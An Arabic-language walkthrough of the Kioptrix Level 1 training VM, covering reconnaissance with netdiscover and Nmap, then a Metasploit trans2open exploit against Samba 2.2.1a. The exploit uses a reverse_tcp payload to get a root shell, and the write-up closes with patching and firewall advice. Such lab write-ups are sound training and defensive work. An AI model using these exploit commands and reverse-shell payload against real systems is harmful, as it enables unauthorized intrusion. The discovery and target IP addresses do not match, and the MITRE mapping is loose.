Kioptrix Level 1: تدقيق شامل للثغرات واستغلالها
🏛️ الهدف المهني
كان الهدف تنفيذ اختبار اختراق منظم على بيئة Kioptrix Level 1 لتحقيق اختراق كامل بصلاحيات 'root' وتوثيق استراتيجيات المعالجة التقنية المناسبة لعمليات الفريق الأحمر والفريق الأزرق.
🏗️ إعادة إنتاج البيئة (تفاصيل العتاد)
الإعدادات الافتراضية للمحاكاة الافتراضية الحديثة غالباً ما تفشل مع نوى 2010 القديمة. لتشغيل هذه الآلة وربطها بالشبكة بنجاح، كانت هناك حاجة للتكوينات المعمارية المحددة التالية:
- نوع نظام التشغيل: Linux / Red Hat (32-bit).
- بنية التخزين: التحويل من SATA إلى IDE Controller لدعم قرص .vmdk القديم.
- بروتوكول الشبكة: تم إعداده كـ PCI FAST-III مع محول Host-only للسماح بالاتصال الداخلي مع آلة الهجوم Kali Linux.
⚔️ التحليل الهجومي (مسار الفريق الأحمر)
اتبع الاستغلال دورة حياة يدوية من التعداد إلى الاستغلال:
1. الاكتشاف والاستطلاع
- Netdiscover: استخدام
netdiscover -r 192.168.184.4 لتحديد عنوان IP للهدف.
- فحص Nmap: حدد الخدمات بما في ذلك SSH (22) وHTTP (80) وRPC (111) وNetBIOS-SSN (139). تم تحديد Samba 2.2.1a كنقطة الدخول الرئيسية.
2. الاستغلال (Samba trans2open)
- الثغرة: CVE-2003-0201 (تجاوز سعة الكومة).
- ربط MITRE ATT&CK:
- التكتيك: تصعيد الامتيازات (TA0004)
- الأسلوب: الاستغلال لتصعيد الامتيازات (T1068)
- بروتوكول Metasploit:
use exploit/linux/samba/trans2open
set RHOSTS 192.168.114.5
set payload linux/x86/shell/reverse_tcp
- النتيجة: تم إنشاء قشرة عكسية بنجاح. أمر
whoami أرجع root.
🛡️ المعالجة الدفاعية (مسار الفريق الأزرق)
لتأمين بيئة مؤسسية، استراتيجيات إدارة الثغرات (VM) التالية إلزامية:
- بروتوكول الترقيع: تحديث Samba إلى أحدث إصدار مدعوم (Samba 4.x). الثغرة في دالة
call_trans2open تم تصحيحها فعلياً في جميع الإصدارات الحديثة.
- تصلب الشبكة: نشر جدران حماية على مستوى المضيف لتقييد المنفذين 139 و445 على الشبكات الفرعية الداخلية الموثوقة فقط.
- استراتيجية دور VM: تندرج هذه المعالجة ضمن دورات إدارة الثغرات القياسية خلال ساعات العمل، مما يضمن استقرار البنية التحتية.
📝 الأدلة التقنية والسجلات اليدوية
توثق الصور التالية التعداد اليدوي المباشر والتنفيذ في الطرفية:
اكتشاف الهدف وملاحظات البنية


إثبات الوصول إلى root (لقطة طرفية)
دليل قشرة Root